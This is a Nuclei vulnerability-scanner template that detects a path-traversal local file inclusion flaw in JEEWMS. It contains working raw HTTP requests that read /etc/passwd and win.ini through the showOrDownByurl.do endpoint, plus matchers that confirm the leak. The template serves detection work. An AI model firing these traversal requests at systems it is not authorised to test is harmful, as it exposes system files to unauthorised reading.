nuclei-templates/vulnerabilities/other/jeewms-lfi.yaml

43 lines
1.0 KiB
YAML

id: jeewms-lfi
info:
name: JEEWMS - Local File Inclusion
author: pikpikcu
severity: high
description: JEEWMS is vulnerable to local file inclusion.
reference:
- https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: jeewms,lfi
requests:
- raw:
- | #linux
GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- | #windows
GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/08/03